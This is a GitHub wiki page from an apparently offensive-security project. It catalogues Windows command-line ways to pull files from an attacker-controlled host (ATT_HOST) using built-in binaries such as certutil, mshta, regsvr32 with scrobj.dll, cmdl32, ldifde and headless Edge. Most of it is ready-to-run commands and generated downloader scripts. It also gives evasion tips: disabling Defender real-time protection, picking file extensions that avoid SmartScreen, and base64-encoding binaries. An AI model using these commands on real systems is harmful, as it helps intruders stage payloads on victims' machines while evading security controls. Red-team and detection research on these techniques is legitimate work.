DL_ _Win_ _cmd - lighthouseitsecurity/barabbas GitHub Wiki

File Download ➔ Windows ➔ cmd

OVERVIEW:

(identify supported options - Windows - file download - cmd)

@ECHO OFF & ECHO [*] cmd - file download - available options & FOR %i IN (certoc.exe certutil.exe cmdl32.exe ConfigSecurityPolicy.exe cscript.exe curl.exe hh.exe IMEWDBLD.EXE InstallUtil.exe ldifde.exe msedge.exe mshta.exe PresentationHost.exe regsvr32.exe xwizard.exe) DO @ECHO OFF & ECHO    [*] %i & dir /s /b C:\*%i & ECHO. & @ECHO ON

certoc.exe (HTTP; HTTPS)

TESTED ON: Windows Server 2022 (21H2)

NOTES:

  • tool modifies content of downloaded file
    • prepends text to start of file GetCACaps: (
    • appends text to end of file )
    • adds extra newlines
  • seems to work only with text files (not further tested)
    • useful for scenarios which require downloading scripts (e.g. PowerShell)
    • workaround: base64-encode target file ➔ download as text file (containing one line (b64 string)) ➔ base64-decode it
  • HTTPS NOT working with self-signed X.509 certificate (importing to certificate store not working; not further analyzed)

(HTTP/HTTPS)

1. [SERVER] base64-encode target file

export LFILE="testfile_10KB";
cat $LFILE | base64 -w0 > ${LFILE}.b64;

2. [CLIENT] open cmd session

(open command prompt)

3. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_10KB

4. [CLIENT] download base64-encoded file

certoc.exe -GetCACAPS http://%ATT_HOST%:%ATT_PORT%/%RFILE%.b64 >> %CD%\%RFILE%.b64

NOTE: if using HTTPS, replace http with https

5. [CLIENT] base64-decode file

(remove added code (prepended; appended))

certutil.exe -decode %CD%\%RFILE%.b64 %CD%\%RFILE%
del %CD%\%RFILE%.b64 && certutil.exe -hashfile %CD%\%RFILE% MD5

certutil.exe (HTTP; HTTPS)

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil

TESTED ON: Windows 10 (22H2)

NOTES:

  • HTTPS working with self-signed X.509 certificate
    • install certificate in certificate store, under Current User -> Trusted Root Certification Authorities
    • its Common Name field must contain, either:
      • DNS resolvable hostname
      • IP address of web server
  • upon download, tool will output an error which can be ignored (i.e. file intact)

(HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_10MB

3. [CLIENT] download file

certutil.exe -urlcache -f http://%ATT_HOST%:%ATT_PORT%/%RFILE% %CD%\%RFILE% && certutil.exe -hashfile %CD%\%RFILE% MD5

NOTE: if using HTTPS, replace http with https

cmdl32.exe (HTTP; HTTPS)

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTES:

  • target file location specified as value of UpdateUrl parameter in configuration file (e.g. UpdateUrl=https://getsamplefiles.com/download/txt/sample-1.txt)
  • downloaded file will be stored in %TMP% (changed to newly created/current directory), as VPNXXXX.tmp (X = random number or letter)
  • HTTPS NOT working with self-signed X.509 certificate (importing to certificate store not working; not further analyzed)

(HTTP)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] create download directory

mkdir download && cd download
icacls.exe %CD% /deny %USERNAME%:(OI)(CI)(DE,DC)

4. [CLIENT] create configuration file (named config)

ECHO [Connection Manager] > config
ECHO CMSFile=config >> config
ECHO ServiceName=WindowsUpdate >> config
ECHO TunnelFile=config >> config
ECHO [Settings] >> config
ECHO UpdateUrl=http://%ATT_HOST%:%ATT_PORT%/%RFILE% >> config

NOTE: if using HTTPS, replace http with https

5. [CLIENT] download file

set TMP=%CD% && cmdl32.exe /vpn /lan %CD%\config

(wait for file to download)

dir /b VPN* > fn.txt && set /p LFILE=<fn.txt
certutil.exe -hashfile %LFILE% MD5

6. [CLIENT] cleanup

icacls.exe %TMP% /grant %USERNAME%:(OI)(CI)(DE,DC) && del /s /q *.* && cd .. && rmdir /s /q download
icacls.exe %CD% /grant %USERNAME%:(OI)(CI)(DE,DC)

ConfigSecurityPolicy.exe (HTTP; HTTPS)

TESTED ON: Windows 10 (22H2)

(HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] download file

"C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe" http://%ATT_HOST%:%ATT_PORT%/%RFILE%

NOTE: if using HTTPS, replace http with https

(wait for file to download)

4. [CLIENT] move target file to current directory

if /I "%RFILE:.=%" neq "%RFILE%" (for /f "tokens=1 delims=." %a in ("%RFILE%") do (echo %a) > fn.txt) else (echo %RFILE% > fn.txt)
set /p FN=<fn.txt && del fn.txt && dir /s /b %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\ | findstr /r "%FN%" > fnp.txt
set /p FNP=<fnp.txt && del fnp.txt
move %FNP% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

NOTES:

  • downloaded file saved in %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<RANDOM-8-CHAR-DIRECTORY>
  • HTTPS NOT working with self-signed X.509 certificate (importing to certificate store not working; not further analyzed)

cscript.exe (HTTP; HTTPS)

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/cscript

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTES:

  • support for various scripting languages:
    • JavaScript
    • VBScript
    • etc (not further analyzed)
  • HTTPS working with self-signed X.509 certificate
    • install certificate in certificate store, under Current User -> Trusted Root Certification Authorities
    • its Common Name field must contain, either:
      • DNS resolvable hostname
      • IP address of web server

(JavaScript - HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] create download script

echo var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); > wget.js
echo WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); >> wget.js
echo WinHttpReq.Send(); >> wget.js
echo BinStream = new ActiveXObject("ADODB.Stream"); >> wget.js
echo BinStream.Type = 1; >> wget.js
echo BinStream.Open(); >> wget.js
echo BinStream.Write(WinHttpReq.ResponseBody); >> wget.js
echo BinStream.SaveToFile(WScript.Arguments(1)); >> wget.js

4. [CLIENT] download file

cscript.exe wget.js http://%ATT_HOST%:%ATT_PORT%/%RFILE% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

NOTE: if using HTTPS, replace http with https

(VBScript - HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200KB

3. [CLIENT] create download script

echo strUrl = WScript.Arguments.Item(0) > wget.vbs 
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 
echo Err.Clear >> wget.vbs 
echo Set http = Nothing >> wget.vbs 
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 
echo http.Open "GET", strURL, False >> wget.vbs 
echo http.Send >> wget.vbs 
echo varByteArray = http.ResponseBody >> wget.vbs 
echo Set http = Nothing >> wget.vbs 
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs 
echo strData = "" >> wget.vbs 
echo strBuffer = "" >> wget.vbs 
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs 
echo Next >> wget.vbs 
echo ts.Close >> wget.vbs

4. [CLIENT] download file

cscript.exe wget.vbs http://%ATT_HOST%:%ATT_PORT%/%RFILE% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

NOTE: if using HTTPS, replace http with https

curl.exe (HTTP; HTTPS)

https://learn.microsoft.com/en-us/virtualization/community/team-blog/2017/20171219-tar-and-curl-come-to-windows

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTE: HTTPS working with self-signed X.509 certificate

  • install certificate in certificate store, under Current User -> Trusted Root Certification Authorities
  • its Common Name field must contain, either:
    • DNS resolvable hostname
    • IP address of web server

(HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] download file

curl.exe http://%ATT_HOST%:%ATT_PORT%/%RFILE% -o %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

NOTE: if using HTTPS, replace http with https

hh.exe (HTTP)

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTE: HTTPS does not seem to work (unrelated to validity of X.509 certificate; not further analyzed)

(HTTP)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] download file

hh.exe http://%ATT_HOST%:%ATT_PORT%/%RFILE%

(save file to current directory)

certutil.exe -hashfile %CD%\%RFILE% MD5

NOTE: two popup windows appear:

  • HTML Help
    • do not close
  • File Download dialog
    • select where to save file and confirm download
      • close both windows upon completion

IMEWDBLD.EXE (HTTP)

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTES:

  • upon download, an error popup window will appear, which can be ignored (i.e. file successfully downloaded)
  • downloaded file saved in one of following directories:
    • %LOCALAPPDATA%\Microsoft\Windows\INetCache\<RANDOM-8-CHAR-DIRECTORY>
    • %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<RANDOM-8-CHAR-DIRECTORY>
  • HTTPS does not seem to work (unrelated to validity of X.509 certificate; not further analyzed)

(HTTP)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] download file

C:\Windows\System32\IME\SHARED\IMEWDBLD.EXE http://%ATT_HOST%:%ATT_PORT%/%RFILE%

(wait for file to download)

4. [CLIENT] move target file to current directory

if /I "%RFILE:.=%" neq "%RFILE%" (for /f "tokens=1 delims=." %a in ("%RFILE%") do (echo %a) > fn.txt) else (echo %RFILE% > fn.txt)
set /p FN=<fn.txt && del fn.txt && dir /s /b %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\ | findstr /r "%FN%" > fnp.txt
set /p FNP=<fnp.txt && del fnp.txt
move %FNP% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

InstallUtil.exe (HTTP)

https://learn.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTES:

  • upon download, an error popup window will appear, which can be ignored (i.e. file successfully downloaded)
  • downloaded file saved in %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<RANDOM-8-CHAR-DIRECTORY>
  • HTTPS does not seem to work (unrelated to validity of X.509 certificate; not further analyzed)

(HTTP)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] download file

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe http://%ATT_HOST%:%ATT_PORT%/%RFILE%

(wait for file to download)

4. [CLIENT] move target file to current directory

if /I "%RFILE:.=%" neq "%RFILE%" (for /f "tokens=1 delims=." %a in ("%RFILE%") do (echo %a) > fn.txt) else (echo %RFILE% > fn.txt)
set /p FN=<fn.txt && del fn.txt && dir /s /b %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\ | findstr /r "%FN%" > fnp.txt
set /p FNP=<fnp.txt && del fnp.txt
move %FNP% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

ldifde.exe (HTTP)

https://krypted.com/active-directory/export-ad-objects-into-ldif-on-windows-server/

https://adamtheautomator.com/csvde/

TESTED ON: Windows Server 2022 (21H2; AD Domain Services role)

NOTES:

  • target OS requirements:
    • Server: AD Domain Services role
    • Desktop: AD LDS role
  • modifies running Active Directory configuration - DO NOT USE IN PRODUCTION ENVIRONMENT
    • saves downloaded file (base64-encoded) under specified attribute (thumbnailPhoto used here) of specified AD object (CN=Guest,CN=Users,DC=TECH,DC=LOCAL used here)
  • will not work if configuration file (config.ldf) structure not correct
    • no space between : and < characters under thumbnailPhoto attribute
    • not ended with - character
  • also possible to use other attributes (e.g. jpegphoto; replace all instances of thumbnailPhoto in configuration file)
  • upon download, an error popup window will appear, which can be ignored (i.e. file successfully downloaded)
  • downloaded file saved in C:\Users\%USERNAME%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>
  • HTTPS does not seem to work (unrelated to validity of X.509 certificate; not further analyzed)

(HTTP)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] export all objects from Active Directory

ldifde.exe -f ADExport.ldf

4. [CLIENT] analyze exported objects/find suitable AD object (e.g. domain user account)

type ADExport.ldf | findstr.exe /c:"dn: CN=Guest,"

5. [CLIENT] create LDF configuration file (named config.ldf)

ECHO dn: CN=Guest,CN=Users,DC=TECH,DC=LOCAL > config.ldf
ECHO changetype: modify >> config.ldf
ECHO replace: thumbnailPhoto >> config.ldf
ECHO thumbnailPhoto:^< http://%ATT_HOST%:%ATT_PORT%/%RFILE% >> config.ldf
ECHO - >> config.ldf

NOTE: modify values as required

6. [CLIENT] update running Active Directory configuration with specified changes - download file

ldifde.exe -i -f config.ldf

(wait for file to download)

7. [CLIENT] move target file to current directory

if /I "%RFILE:.=%" neq "%RFILE%" (for /f "tokens=1 delims=." %a in ("%RFILE%") do (echo %a) > fn.txt) else (echo %RFILE% > fn.txt)
set /p FN=<fn.txt && del fn.txt && dir /s /b %LOCALAPPDATA%\Microsoft\Windows\INetCache\ | findstr /r "%FN%" > fnp.txt
set /p FNP=<fnp.txt && del fnp.txt
move %FNP% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

8. [CLIENT] cleanup - update config file (named config.ldf)

ECHO dn: CN=Guest,CN=Users,DC=TECH,DC=LOCAL > config.ldf
ECHO changetype: modify >> config.ldf
ECHO delete: thumbnailPhoto >> config.ldf
ECHO - >> config.ldf

NOTE: modify values as required

9. [CLIENT] cleanup - update running Active Directory configuration with specified changes - revert changes

ldifde.exe -i -f config.ldf

10. [CLIENT] cleanup - confirm changes

ldifde.exe -f ADExport.ldf
type ADExport.ldf | findstr.exe /c:"thumbnailPhoto"

ms-appinstaller protocol (HTTP; HTTPS)

TESTED ON: Windows 10 (22H2)

(HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_10KB

3. [CLIENT] download file

start ms-appinstaller://?source=http://%ATT_HOST%:%ATT_PORT%/%RFILE%

NOTE: if using HTTPS, replace http with https

(wait for file to download; do NOT close popup window until instructed)

4. [CLIENT] move target file to current directory

if /I "%RFILE:.=%" neq "%RFILE%" (for /f "tokens=1 delims=." %a in ("%RFILE%") do (echo %a) > fn.txt) else (echo %RFILE% > fn.txt)
set /p FN=<fn.txt && del fn.txt && dir /s /b C:\Users\%USERNAME%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\ | findstr /r "%FN%" > fnp.txt
set /p FNP=<fnp.txt && del fnp.txt
move %FNP% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

(close popup window)

msedge.exe (HTTP; HTTPS)

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

(with Edge GUI popup - HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] download file

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" http://%ATT_HOST%:%ATT_PORT%/%RFILE%

(move file from download directory to current directory)

certutil.exe -hashfile %CD%\%RFILE% MD5

NOTES:

  • if using HTTPS, replace http with https
  • Edge will popup and download the file
    • file will be downloaded to Edge's download directory
  • to avoid SmartScreen triggering, user harmless file extension (e.g. .txt, .zip; not further tested)
  • HTTPS working with self-signed X.509 certificate (accept it when Edge pops up)

(without Edge GUI - HTTP/HTTPS)

1. [SERVER] base64-encode target file

export LFILE="testfile_10MB";
cat $LFILE | base64 -w0 > ${LFILE}.b64.html;

2. [CLIENT] open cmd session

(open command prompt)

3. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_10MB

4. [CLIENT] download base64-encoded file

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --enable-logging --disable-gpu --dump-dom http://%ATT_HOST%:%ATT_PORT%/%RFILE%.b64.html > %CD%\%RFILE%.b64.html

NOTES:

  • if using HTTPS, replace http with https
  • append .html extension to target file
    • base64-encode binaries

5. [CLIENT] base64-decode file

(remove added HTML code (prepended; appended))

certutil.exe -decode %CD%\%RFILE%.b64.html %CD%\%RFILE%
del %CD%\%RFILE%.b64.html && certutil.exe -hashfile %CD%\%RFILE% MD5

NOTES:

  • Edge will silently download the file
    • no Edge GUI popup window
    • file will be downloaded to current directory
  • HTTPS working with self-signed X.509 certificate
    • install certificate in certificate store, under Current User -> Trusted Root Certification Authorities
    • its Common Name field must contain, either:
      • DNS resolvable hostname
      • IP address of web server

mshta.exe (HTTP; HTTPS)

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTES:

  • upon downloading, file's content will be displayed in notepad (popup window)
    • possible to save file, manually
  • downloaded file saved in %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<RANDOM-8-CHAR-DIRECTORY>
    • inconsistent with HTTPS (i.e. sometimes not saved; not further analyzed)
      • possible to save file via notepad popup window
  • HTTPS working with self-signed X.509 certificate (security alert window will popup; accept certificate)

(HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] download file

mshta.exe http://%ATT_HOST%:%ATT_PORT%/%RFILE%

NOTE: if using HTTPS, replace http with https

(wait for file to download)

4. [CLIENT] move target file to current directory

if /I "%RFILE:.=%" neq "%RFILE%" (for /f "tokens=1 delims=." %a in ("%RFILE%") do (echo %a) > fn.txt) else (echo %RFILE% > fn.txt)
set /p FN=<fn.txt && del fn.txt && dir /s /b %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\ | findstr /r "%FN%" > fnp.txt
set /p FNP=<fnp.txt && del fnp.txt
move %FNP% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

PresentationHost.exe (HTTP; HTTPS)

https://learn.microsoft.com/en-us/dotnet/desktop/wpf/app-development/wpf-host-presentationhost-exe

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTES:

  • multiple popup windows appear (related to Internet Explorer/Edge)
  • depending on the download scenario, downloaded file saved in one of following directories:
    • Edge's download directory
    • Internet Explorer's download directory
    • somewhere within %LOCALAPPDATA%\Microsoft\Windows\INetCache\
  • Internet Explorer process may hang
    • manually end all iexplore.exe processes
  • HTTPS working with self-signed X.509 certificate (accept it when Edge pops up)

(HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] download file

PresentationHost.exe http://%ATT_HOST%:%ATT_PORT%/%RFILE%

(wait for file to download)

NOTE: if using HTTPS, replace http with https

4. [CLIENT] move target file to current directory

(move file from download directory to current directory)

certutil.exe -hashfile %CD%\%RFILE% MD5

regsvr32.exe (HTTP; HTTPS)

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTES:

  • upon download, an error popup window will appear, which can be ignored (i.e. file successfully downloaded)
  • avoid downloading text files (appends some characters to file)
  • Windows Defender Antivirus' Real-time protection may block the download
    • if so, disable it
  • HTTPS working with self-signed X.509 certificate
    • install certificate in certificate store, under Current User -> Trusted Root Certification Authorities
    • its Common Name field must contain, either:
      • DNS resolvable hostname
      • IP address of web server

(HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] disable Windows Defender Antivirus' Real-time protection

4. [CLIENT] download file

regsvr32.exe /u /n /s /i:http://%ATT_HOST%:%ATT_PORT%/%RFILE% scrobj.dll

NOTE: if using HTTPS, replace http with https

(wait for file to download)

5. [CLIENT] move target file to current directory

if /I "%RFILE:.=%" neq "%RFILE%" (for /f "tokens=1 delims=." %a in ("%RFILE%") do (echo %a) > fn.txt) else (echo %RFILE% > fn.txt)
set /p FN=<fn.txt && del fn.txt && dir /s /b %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\ | findstr /r "%FN%" > fnp.txt
set /p FNP=<fnp.txt && del fnp.txt
move %FNP% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

xwizard.exe (HTTP; HTTPS)

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTES:

  • upon download, an error popup window will appear, which can be ignored (i.e. file successfully downloaded)
  • HTTPS NOT working with self-signed X.509 certificate (importing to certificate store not working; not further analyzed)

(HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] download file

xwizard.exe RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z http://%ATT_HOST%:%ATT_PORT%/%RFILE%

NOTE: if using HTTPS, replace http with https

(wait for file to download)

4. [CLIENT] move target file to current directory

if /I "%RFILE:.=%" neq "%RFILE%" (for /f "tokens=1 delims=." %a in ("%RFILE%") do (echo %a) > fn.txt) else (echo %RFILE% > fn.txt)
set /p FN=<fn.txt && del fn.txt && dir /s /b %LOCALAPPDATA%\Microsoft\Windows\INetCache\ | findstr /r "%FN%" > fnp.txt
set /p FNP=<fnp.txt && del fnp.txt
move %FNP% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

⚠️ **GitHub.com Fallback** ⚠️